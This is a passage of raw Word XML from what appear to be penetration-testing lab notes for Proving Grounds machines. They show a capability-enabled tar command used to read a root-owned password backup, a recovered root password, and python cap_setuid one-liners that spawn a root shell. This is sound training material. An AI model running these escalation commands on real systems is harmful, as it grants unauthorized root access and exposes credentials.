      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Instead, you need to do some manual enumeration until you find the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.old_pass.bak</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file within the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/backups</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> folder.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000236E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4452938" cy="1855391"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="305" name="image314.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image314.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId749"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4452938" cy="1855391"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000236F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002370">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can see the file is owned by root, so the password is likely related to that account, right?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002371">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, if you try and just open it, you will get permission denied. Thankfully, we have our extremely capable friend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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002372">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We will get around the permission issues by compressing the file, and then decompressing it, bypassing the permission issue due to the unique Capability set to the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command. For this I moved back to where the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command was located,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002373">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002374">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Compress the file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002375">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./tar -cf pass.tar /var/backups/.old_pass.bak</w:t>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Decompress our file, with permissions ignored.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002378">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./tar -xf pass.tar</w:t>
      </w:r>
    </w:p>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spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This should give us access to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.old_pass.bak</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file, though you might need to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> a little. When you open the file you should come across the password </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ts&amp;4&amp;YurgtRX(=~h</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, another one we wouldn't brute force.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000237B">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">With this password you can now attempt to login as root, I simply logged off of usermin and then went back in as root and reopened the console and popped open the flag.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000237C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ue67prv7aao0" w:id="315"/>
      <w:bookmarkEnd w:id="315"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploiting python capabilities</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000237D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000237E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Also seen in </w:t>
      </w:r>
      <w:hyperlink r:id="rId750">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Levram</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/python3.10 cap_setuid=ep</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000237F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="471"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploited with:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002380">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="471"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/python3.10 -c 'import os; os.setuid(0); os.system("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002381">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002382">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the Katana PG Play, we saw this after running LinPeas (but we would have saw the same thing if we had ran</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> getcap -r / 2&gt;/dev/null</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002383">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002384">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002385">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="4546600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="245" name="image254.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image254.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId751"/>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2386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1324"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/python2.7 cap_setuid+ep</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002387">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002388">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since this is a /usr/bin thing, I went to GTFO bins and found that there was a </w:t>
      </w:r>
      <w:hyperlink r:id="rId752">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">capability listed for python</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (not specific to 2.7)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002389">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000238A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1524000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="123" name="image123.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image123.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId753"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="152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38B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000238C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So since we have python 2.7 we would run:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000238D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="278"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/python2.7 -c 'import os; os.setuid(0); os.system("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000238E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000238F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Why they only ran the last line and not the first two:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002390">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="222"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The first two lines are setup. If the capability is already present on the binary (e.g. pre-set by the challenge or vulnerable system), you only need to run the payload—the last line. And here, as we saw before, the capability was already set on the python binary so no need to do this set up</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002391">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="222"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You will see this often in GTFO bins, where you only run the last line</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002392">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002393">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Explaining the set up (first two lines):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002394">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cp $(which python) .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002395">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1123"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Copies the system's Python binary to the current directory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002396">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1123"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Why? So you can modify it (e.g. apply capabilities) without affecting the global system Python.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002397">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002398">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo setcap cap_setuid+ep python</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002399">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="773"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sets the CAP_SETUID capability on the local copy of Python.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000239A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="773"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This gives the binary permission to change its effective user ID (e.g. to 0 for root).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000239B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023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9D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_tsxws92cycql" w:id="316"/>
